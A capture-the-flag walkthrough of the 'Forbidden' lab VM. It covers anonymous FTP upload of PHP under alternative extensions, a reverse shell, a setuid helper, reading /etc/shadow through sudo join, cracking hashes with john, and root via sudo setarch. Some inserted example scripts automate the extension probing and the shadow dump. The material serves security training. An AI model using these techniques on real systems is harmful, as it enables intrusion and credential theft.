hack-my-vm:Forbidden

Forbidden

Port scanning

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.1.32                                                                                   [3:15:23]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-20 03:15 CST
Nmap scan report for 192.168.1.32
Host is up (0.00069s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
8000/tcp open http-alt
MAC Address: 08:00:27:CF:0C:89 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds
kali@kali [~] ➜  sudo nmap -sT -sV -sC -p21,80 -O 192.168.1.32                                                                                    [2:46:05]
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-20 03:15 CST
Nmap scan report for 192.168.1.32
Host is up (0.00062s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Feb 19 13:18 www [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.5
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:CF:0C:89 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (99%), Linux 5.0 - 5.5 (99%), Linux 5.0 - 5.4 (97%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 2.6.32 (96%), Linux 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.56 seconds

Port 80

kali@kali [~] ➜  curl http://192.168.1.32                                                                                                         [3:15:40]
<h1>SECURE WEB/FTP<h1>

Hi, Im the best admin of the world.
You cannot execute .php code on this server so you cannot
obtain a reverse shell. Not sure if its misconfigured another things... but
the importart is that php is disabled.

-marta

The admin's note tells us plain .php files most likely won't be executed, so uploading a .php shell is pointless on its own.

kali@kali [~] ➜  sudo dirsearch -u http://192.168.1.32                                                                                            [3:16:54]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.1.32/_25-02-20_03-17-45.txt

Target: http://192.168.1.32/

[03:17:45] Starting:
[03:18:29] 200 - 10B - /robots.txt

Task Completed

robots.txt contains nothing of interest.

FTP

kali@kali [~] ➜  ftp 192.168.1.32                                                                                                                 [3:18:43]
Connected to 192.168.1.32.
220 (vsFTPd 3.0.3)
Name (192.168.1.32:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd www
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||44235|)
150 Here comes the directory listing.
-rwxrwxrwx 1 0 0 241 Oct 09 2020 index.html
-rwxrwxrwx 1 0 0 75 Oct 09 2020 note.txt
-rwxrwxrwx 1 0 0 10 Oct 09 2020 robots.txt

FTP accepts anonymous login, and the writable www directory holds the same index.html and robots.txt that port 80 serves, so it is the web root (or a copy of it). There is also a note.txt; let's read it over HTTP.

kali@kali [~] ➜  curl http://192.168.1.32/note.txt                                                                                                [3:15:19]
The extra-secured .jpg file contains my password but nobody can obtain it.

So a password is hidden in a picture, but with no SSH (port 22 is closed) a password is of little use yet. Park that for now; the remaining route is uploading a reverse shell through anonymous FTP, on the assumption that the "php is disabled" filter is not complete.

ftp> ls
229 Entering Extended Passive Mode (|||44235|)
150 Here comes the directory listing.
-rw-r--r-- 1 105 113 109 Feb 19 13:18 1.php3
-rw-r--r-- 1 105 113 109 Feb 19 13:18 1.php5
-rw-r--r-- 1 105 113 109 Feb 19 13:18 1.phtml
-rwxrwxrwx 1 0 0 241 Oct 09 2020 index.html
-rwxrwxrwx 1 0 0 75 Oct 09 2020 note.txt

// Upload the same PHP payload under alternative extensions (.php3, .php5, .phtml) that a PHP handler may still match, then request each one over HTTP.
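The extension-probing step above, written out as an added example (not the writeup's or the box's code). It uploads a harmless marker payload under each candidate extension, requests it back, and classifies the response as executed (marker only), raw source (the PHP tags come back as text), or blocked. Host, FTP directory and URL are assumptions taken from this box; the transports are injected so the logic can be exercised offline.

```python
"""Find which upload extensions a web server actually hands to PHP.
Added example for this writeup; host/ports/paths are assumptions."""
import ftplib
import io
import urllib.error
import urllib.request

# Extensions a PHP handler regex commonly matches besides plain .php
CANDIDATE_EXTS = ["php", "php3", "php4", "php5", "php7", "phtml", "phar"]

MARKER = "EXT_PROBE_OK"
# Printed only if executed; served raw, the PHP tags are still visible.
PAYLOAD = f"<?php echo '{MARKER}'; ?>"


def classify(status, body):
    """Decide what the server did with one candidate file."""
    if status == 403:
        return "blocked"
    if status != 200:
        return f"http-{status}"
    if body.strip() == MARKER:
        return "executed"
    if "<?php" in body:
        return "raw-source"  # served as text: not handed to PHP
    return "unknown"


def probe(exts, upload, fetch, base="probe"):
    """Upload base.<ext> for each ext and classify the HTTP response.
    upload(name, data) and fetch(name) -> (status, body) are injected."""
    results = {}
    for ext in exts:
        name = f"{base}.{ext}"
        upload(name, PAYLOAD.encode())
        status, body = fetch(name)
        results[ext] = classify(status, body)
    return results


def executed_extensions(results):
    """Extensions worth using for the real payload (e.g. a reverse shell)."""
    return sorted(e for e, r in results.items() if r == "executed")


# Real transports for this box (assumed values; adjust for the target)
FTP_HOST, FTP_DIR, HTTP_BASE = "192.168.1.32", "www", "http://192.168.1.32"


def ftp_upload(name, data):
    with ftplib.FTP(FTP_HOST) as ftp:
        ftp.login()  # anonymous
        ftp.cwd(FTP_DIR)
        ftp.storbinary(f"STOR {name}", io.BytesIO(data))


def http_fetch(name):
    try:
        with urllib.request.urlopen(f"{HTTP_BASE}/{name}", timeout=5) as r:
            return r.status, r.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


if __name__ == "__main__":
    res = probe(CANDIDATE_EXTS, ftp_upload, http_fetch)
    for ext, verdict in res.items():
        print(f"{ext:6} {verdict}")
    print("executable:", executed_extensions(res))
```

Once an extension reports "executed", swap PAYLOAD for the reverse shell and upload it under that extension only; the probe files should be deleted afterwards.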

In the end .php5 is executed and the reverse shell connects.
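The page never shows the server configuration, so the following is an assumed reconstruction, added here and not the box's real config: the symptom on the page (".php is disabled" yet .php5 runs) matches a deny rule on the literal .php extension sitting next to a PHP-FPM handler whose regex is wider. The socket path and web root are assumptions.

```nginx
# ASSUMED vulnerable config (reconstruction, not the box's file)
server {
    listen 80;
    root /srv/ftp/www;            # same directory anonymous FTP can write to
    index index.html;

    # The admin's "php is disabled": only the literal .php extension
    location ~ \.php$ {
        return 403;
    }

    # Legacy handler still wired to PHP-FPM; first matching regex wins,
    # and \.php$ does not match probe.php5, so this one does
    location ~ \.(php3|php5|phtml)$ {
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php/php-fpm.sock;   # assumed socket
    }
}

# Hardened equivalent: no fastcgi_pass at all, and the web root is not
# the anonymous-upload directory
server {
    listen 80;
    root /var/www/html;
    index index.html;

    location ~ \.(php[3-7]?|phtml|phar)$ {
        return 403;
    }
}
```

The point of the hardened block is that "disabling PHP" by denying one extension is a blocklist; removing the handler (and keeping uploads out of the document root) removes the execution path regardless of extension.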

kali@kali [~] ➜  nc -lvnp 8888                                                                                                                    [3:25:00]
listening on [any] 8888 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.32] 38482
bash: cannot set terminal process group (330): Inappropriate ioctl for device
bash: no job control in this shell
www-data@forbidden:/srv/ftp/www$

Privilege escalation

www-data@forbidden:/home/marta$ ls -la
ls -la
total 52
drwxr-xr-x 3 marta marta 4096 Oct 9 2020 .
drwxr-xr-x 5 root root 4096 Oct 9 2020 ..
-rw------- 1 marta marta 55 Oct 9 2020 .Xauthority
-rw-r--r-- 1 marta marta 220 Oct 9 2020 .bash_logout
-rw-r--r-- 1 marta marta 3526 Oct 9 2020 .bashrc
-rwsr-sr-x 1 root marta 16712 Oct 9 2020 .forbidden
drwxr-xr-x 3 marta marta 4096 Oct 9 2020 .local
-rw-r--r-- 1 marta marta 807 Oct 9 2020 .profile
-rw-r--r-- 1 root root 130 Oct 9 2020 hidden.c
www-data@forbidden:/home/marta$ cat hidden.c
cat hidden.c
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
    /* uid 1001 is markos (the resulting shell runs as that user).
       Return values are unchecked; once setuid() has dropped root,
       setgid(1001) can only succeed if 1001 is already the real,
       effective or saved gid, so it silently fails here. */
    setuid(1001); setgid(1001); system("/bin/bash");
}

So there is a small C program that drops into a shell as uid 1001, and .forbidden is setuid root / setgid marta. The obvious guess is that .forbidden is the compiled hidden.c, so rather than reversing it, just run it.

www-data@forbidden:/home/marta$ ./.forbidden
$ python -c 'import pty; pty.spawn("/bin/bash")'
markos@forbidden:/home/marta$ whoami
whoami
markos
markos@forbidden:/home/marta$

That confirms uid 1001 is markos. Now search the filesystem for the picture the note said holds a password.

markos@forbidden:/home/marta$ find / -name "*.jpg" 2>/dev/null
find / -name "*.jpg" 2>/dev/null
/var/www/html/TOPSECRETIMAGE.jpg
markos@forbidden:/home/marta$

Copy it back to the attacking machine for analysis.

kali@kali [~] ➜  exiftool TOPSECRETIMAGE.jpg                                                                                                      [3:34:18]
ExifTool Version Number : 12.76
File Name : TOPSECRETIMAGE.jpg
Directory : .
File Size : 33 kB
File Modification Date/Time : 2020:10:10 01:04:22+08:00
File Access Date/Time : 2025:02:20 02:31:41+08:00
File Inode Change Date/Time : 2025:02:20 02:31:31+08:00
File Permissions : -rw-rw-r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 324
Image Height : 216
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 324x216
Megapixels : 0.070
kali@kali [~] ➜ binwalk TOPSECRETIMAGE.jpg [3:34:19]

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01

Neither the metadata nor an embedded file contains a password (steganography tools were not tried here). The remaining candidate is the name of the "extra-secured" file itself.

markos@forbidden:/home$ su - marta
su - marta
Password: TOPSECRETIMAGE

marta@forbidden:~$ whoami
whoami
marta
marta@forbidden:~$

Escalated to marta. Enumerate manually.

marta@forbidden:~$ sudo -l
sudo -l
Matching Defaults entries for marta on forbidden:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User marta may run the following commands on forbidden:
(ALL : ALL) NOPASSWD: /usr/bin/join
marta@forbidden:~$ sudo /usr/bin/join -a 2 /dev/null /etc/shadow
sudo /usr/bin/join -a 2 /dev/null /etc/shadow
root:$6$8nU2FdqnxRtT9mWF$9q7El.D7BDrlzNyYYPNqjTcwsQEsC7utrzszLgbe9V.3KqYSfx2XgqjIEeToP41TJTiZQOGVsdCzIAYHw5O.51:18544:0:99999:7:::
daemon:*:18544:0:99999:7:::
bin:*:18544:0:99999:7:::
sys:*:18544:0:99999:7:::
sync:*:18544:0:99999:7:::
games:*:18544:0:99999:7:::
man:*:18544:0:99999:7:::
lp:*:18544:0:99999:7:::
mail:*:18544:0:99999:7:::
news:*:18544:0:99999:7:::
uucp:*:18544:0:99999:7:::
proxy:*:18544:0:99999:7:::
www-data:*:18544:0:99999:7:::
backup:*:18544:0:99999:7:::
list:*:18544:0:99999:7:::
irc:*:18544:0:99999:7:::
gnats:*:18544:0:99999:7:::
nobody:*:18544:0:99999:7:::
_apt:*:18544:0:99999:7:::
systemd-timesync:*:18544:0:99999:7:::
systemd-network:*:18544:0:99999:7:::
systemd-resolve:*:18544:0:99999:7:::
messagebus:*:18544:0:99999:7:::
marta:$6$h.4ZF5esZ/N1OIcu$8vL1D3iM6iuhniSG8nIz0582atbIV6y/UBl0eks1.Wrd51BqLK8Wqt91WXg0Y2mrdNY4luPQkqUWXFXWxLVwe/:18544:0:99999:7:::
systemd-coredump:!!:18544::::::
ftp:*:18544:0:99999:7:::
sshd:*:18544:0:99999:7:::
markos:$6$PTerrFpyfOmkM5Xi$oo8gNZyyxsZbKhOIXrm2w/x.Xvhdr7Ny/4JgLDRLRAxAwEwGtH2kD7PjzeloAstqCPq/KKrqrPioMM8vwWbqZ.:18544:0:99999:7:::
peter:$6$QAeWH9Et9PAJdYz/$/4VhburW9KoVTRY1Ry63wNEfr4rxwQGaRJ3kKW2nEAk0LcqjqZjy/m5rtaCi3VebNu7AaGFhQT4FBgbQVIyq81:18544:0:99999:7:::
marta@forbidden:~$

join can be run as root via sudo. With -a 2 it prints every line of the second file that has no partner in the first, and nothing pairs against /dev/null, so `join -a 2 /dev/null /etc/shadow` is an arbitrary file read as root. Copy the hashes of the two remaining accounts, root and peter, back to the attacking machine to crack.
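The file-read trick above, as an added example that is not part of the writeup: a wrapper around `sudo join` plus a filter that keeps only accounts whose shadow field is a real hash (locked `*`/`!`/`!!` entries are useless to john). The shadow sample is constructed; the output file name is an assumption.

```sh
#!/bin/sh
# Added example (not from the writeup). Read a root-only file through
# `sudo join` and keep only the lines worth feeding to john.

# join(1) prints paired lines from two files; -a 2 also prints every line
# of FILE2 with no partner. Nothing pairs against /dev/null, so the whole
# of FILE2 is printed.
dump_via_join() {
    sudo join -a 2 /dev/null "$1"
}

# Shadow-format filter: drop accounts with an empty or locked second field
# (*, !, !!) and emit user:hash, which john accepts directly.
crackable_hashes() {
    awk -F: '$2 != "" && $2 !~ /^[*!]/ { print $1 ":" $2 }'
}

# Constructed sample (not the box's real hashes) to run the filter offline
SAMPLE='root:$6$saltsalt$hashhash:18544:0:99999:7:::
daemon:*:18544:0:99999:7:::
systemd-coredump:!!:18544::::::
peter:$6$othersalt$otherhash:18544:0:99999:7:::'

if [ "${1:-}" = "--live" ]; then
    # On the target: assumed output file name
    dump_via_join /etc/shadow | crackable_hashes > shadow.john
else
    printf '%s\n' "$SAMPLE" | crackable_hashes
fi
```

Run with `--live` on the box to produce shadow.john; without arguments it only demonstrates the filter on the sample. The same `dump_via_join` works for any root-readable file, not just /etc/shadow.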

kali@kali [~] ➜  cat x                                                                                                                       
peter:$6$QAeWH9Et9PAJdYz/$/4VhburW9KoVTRY1Ry63wNEfr4rxwQGaRJ3kKW2nEAk0LcqjqZjy/m5rtaCi3VebNu7AaGFhQT4FBgbQVIyq81:18544:0:99999:7:::
root:$6$8nU2FdqnxRtT9mWF$9q7El.D7BDrlzNyYYPNqjTcwsQEsC7utrzszLgbe9V.3KqYSfx2XgqjIEeToP41TJTiZQOGVsdCzIAYHw5O.51:18544:0:99999:7:::
kali@kali [~] ➜ john x
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
boomer (peter)
Proceeding with incremental:ASCII
1g 0:00:36:38 3/3 0.000454g/s 4190p/s 4190c/s 4190C/s bunkyood..bunkryne
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

john recovers peter's password (boomer) from the wordlist; root's hash is not cracked before the session is aborted. Switch to peter and enumerate again.

peter@forbidden:~$ whoami
whoami
peter
peter@forbidden:~$ sudo -l
sudo -l
Matching Defaults entries for peter on forbidden:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on forbidden:
(ALL : ALL) NOPASSWD: /usr/bin/setarch
peter@forbidden:~$ uname -m
uname -m
x86_64
peter@forbidden:~$

Per the man page, setarch sets the execution personality for the given architecture and then execs the program, so under sudo it simply launches whatever command follows as root.

peter@forbidden:~$ sudo setarch x86_64 /bin/bash
sudo setarch x86_64 /bin/bash
root@forbidden:/home/peter# whoami
whoami
root

Done.